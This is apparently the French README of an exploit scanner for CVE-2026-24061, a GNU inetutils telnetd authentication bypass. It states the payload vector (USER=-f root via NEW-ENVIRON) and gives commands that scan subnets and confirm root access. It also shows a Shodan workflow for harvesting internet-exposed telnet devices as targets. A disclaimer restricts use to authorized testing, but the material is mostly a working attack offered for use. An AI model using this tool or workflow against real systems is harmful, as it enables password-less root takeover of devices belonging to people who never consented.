
Scanne pour CVE-2026-24061 contournement d'authentification telnetd, génère des payloads et vérifie l'accès root sur les appareils GNU inetutils telnetd vulnérables.
⚠️ AVIS LÉGAL TRÈS IMPORTANT ⚠️
Cet outil est exclusivement destiné à des fins éducatives, à la recherche en sécurité, à l'analyse de vulnérabilités et aux tests autorisés.
USER=-f root (ou variantes) via l'option NEW-ENVIRON permet une connexion immédiate en tant que root sans mot de passe.Ce scanner n'a été possible que grâce à l'excellente analyse technique et à la preuve de concept publiées par l'équipe de Hakai Security.
Leur article détaillé a fourni les bases techniques précises sur le vecteur d'exploitation, les payloads réels et le comportement du telnetd vulnérable.
→ Lisez l'analyse complète ici :
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Merci beaucoup à Hakai Security pour leur transparence, leur qualité technique et leur contribution à la communauté de la sécurité. Vous avez contribué à rendre cet outil plus précis et plus utile pour la recherche responsable.
--users (par défaut inclut root, admin, pi, ubuntu, debian, etc.)id et whoami (--verify)-w)# Recommandé : utilisez virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate
# Installez les dépendances
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# Avec une liste de cibles (ex : Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# Ciblé sur root (plus rapide)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# Dry-run (liste uniquement les IP)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# Initialisez avec votre clé API
shodan init SUA_API_KEY_AQUI
# Téléchargez les cibles potentielles
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# Extrayez les IP
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# Scan
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
Les pull requests sont les bienvenues, à condition de maintenir l'orientation éthique et de renforcer les avertissements de responsabilité. Licence MIT License – mais je le répète : toute utilisation non autorisée relève de la seule responsabilité de l'utilisateur. Conçu pour l'étude, la sensibilisation et la recherche en sécurité.
⭐ Si vous l'avez trouvé utile, donnez une étoile !
🛡️ Utilisez-le avec une extrême responsabilité.
Made with ❤️ by killsystema